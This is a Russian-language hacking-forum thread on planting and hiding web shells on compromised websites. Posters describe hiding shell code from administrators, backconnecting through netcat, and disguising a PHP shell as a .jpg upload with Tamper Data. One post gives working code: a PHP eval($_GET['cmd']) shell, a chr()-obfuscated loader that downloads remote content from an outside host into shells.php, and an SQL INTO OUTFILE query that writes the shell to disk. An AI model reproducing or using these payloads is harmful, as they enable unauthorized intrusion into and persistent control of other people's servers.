Я не хакер. А вообще в отдельном файле хранить шелл по-моему не айс. http://forum.antichat.ru/threadnav264591-2-10.html
Ну, тут согласен Не каждый, и вообще, это сообщение тебя не касалось. Только разбанили, и опять за своё?
если бы оно меня не касалось, ты бы его написал в личку. а вообще твой пост выше - это чушь несусветная. мы говорим о более-менее админах, а не о нубах, от которых вообще ничего прятать не нужно. и уж более-менее админ никогда не будет искать шелл по названию файла, а будет искать по содержимому, т.е. нашей основной задачей является скрытие функций, которые может заподозрить админ. тоже самое. для более-менее админов не будет играть роли раположение файла, т.к. искать он будет не в ручную перелистывая каталоги. ну это лол чистой воды. единственное адкеватное решение. забинденый порт не имеет никакого отношения к сокрытию шелла. ну а в случае если ты делаешь бэкконект на свой комп (а ты 100% это делаешь)))), то комментарии излишни. ну это вообще бред какой-то. речь шла о сокрытии шелла, а не о рутании. понятное дело, что получив доступ к серверу я могу делать что угодно, но таких условий не стояло. а я дописываю строчку размером в 24 байта, в которой не содержится палевных функций в несколько файлов, меняю дату их создания и радуюсь.
Ты не понял? Ну и ладно... P.S. Пора чистить топик... 4TC, http://forum.antichat.ru/showthread.php?t=191917
Просто написали в теме, ответил тут же.. Естественно, вставляю что-то сперва, лицензию, к примеру Нет, сначала подрубаюсь к дедику, затем уже ставлю на прослушку неткат, и уж затем подрубаюсь к основному. [/QUOTE]
вот скажите, какой смысл нападать на тс?? что он написал что то не верное??? или обман?? или продает паблик? он сделал доброе дело для тех кто этого не знает, написал хорошую читабельную статью, ему надо сказать спс а не нападать, и он не обязан все что делает выкладывать в паблик, что посчитал нужным написать в статье то и сделал.
Вот еще один способ: Например плагином Tamper Data для Mozilla Firefox. Запускаешь перехват данных и пытаешься залить шелл, после чего жмешь вмешаться. В ответ придет, что то вроде: Меняешь на: И отправляешь. http://forum.antichat.ru/showpost.php?p=2344055&postcount=4 Так же можно воспользоваться этим, но только наоборот для сокрытия шелла, мы начинаем закачивать шелл на сайт(в формате .jpg)и после начала перехватываем запрос тампер датой и что то вроде: меняем на: и шелл в формате http://site.gov/images/logo.jpg исполняется как пхп файл в браузере Только не начинайте гнобить...и ТСа тоже не гнобите, он наоборот молодец, а эту тему можно развивать и каждый будет вносить сюда свою лепту, частичку своего опыта и в скором будущем мы(сообщество античата)будем располагать огромными знаниями в этой области!
Объясню: PHP: <?php eval($_GET['cmd']); ?> Если ты просто так пошлёшь file_get_contents('http://url/ws.txt'), то у тебя будет: PHP: <?php eval('file_get_contents("http://url/ws.txt");'); ?> Т. е. file_get_contents никуда не запишишиться/не выполниться. Однако в первом случае будет: PHP: <?php eval(file_get_contents('http://url/ws.txt')); ?> Мы можем просто вписать: Code: <?php eval($_GET[cmd]); ?> Eval выполняет функции php, как вы видите, это мини шелл... используют так: Code: host.com/пут_до_той_папки_что_вы_указали/shells.php?cmd=function_php; Как видите, без кавычек, а тип будет String Так что теперь делаем код: Code: $url = chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(108).chr(101).chr(103).chr(105).chr(111).chr(110).chr(101).chr(114).chr(115).chr(56).chr(56).chr(46).chr(110).chr(97).chr(114).chr(111).chr(100).chr(46).chr(114).chr(117).chr(47).chr(101).chr(114).chr(114).chr(111).chr(114).chr(46).chr(116).chr(120).chr(116);$content = file_get_contents($url);$h = fopen(shells.chr(46).php,w);$text = $content;fwrite($h,$text);fclose($h); Parse error: syntax error, unexpected T_STRING in * on line 2 вписываем следующее: Code: UPDATE `table_name` SET `column_name_1` = '<?php $url = "Путь_до_шелла";$content = file_get_contents($url);$h = fopen("shells.php","w");$text = "$content";fwrite($h,$text);fclose($h); ?>' WHERE `column_name_2` =[Значение] LIMIT 1 ; SELECT * FROM `table_name` WHERE `column_name_2` =[Значение] INTO OUTFILE '[Полный_путь_до_папки_с_правами_закачки_файла/shell.php]' ; Теперь переходим по адресу Code: host.com/пут_до_той_папки_что_вы_указали/shells.php Это делается одним запросом. Открою секрет - в поле имя напиши *, перед тобой предстанут все файлы. ------------- Модераторы - перенесите статью в болталку или удалите этот бред, буду благодарен.
XAMENA, +10500 Ты не модер? Вот если что профили модеров: http://forum.antichat.ru/member.php?u=90907 http://forum.antichat.ru/member.php?u=22449 P.S. Мне стыдно. А я то думал ачат огого P.S.S. TC старался. Но увы...
>Parse error: syntax error, unexpected T_STRING in * on line 2 Может, попробуешь пробелы убрать, которые ачат наставил автоматом хрен знает зачем?) (впрочем, как и в скулях..) >Открою секрет - в поле имя напиши *, перед тобой предстанут все файлы. Спасибо, буду знать ------------- >Модераторы - перенесите статью в болталку или удалите этот бред, буду благодарен. Это не бред, это работающие способы.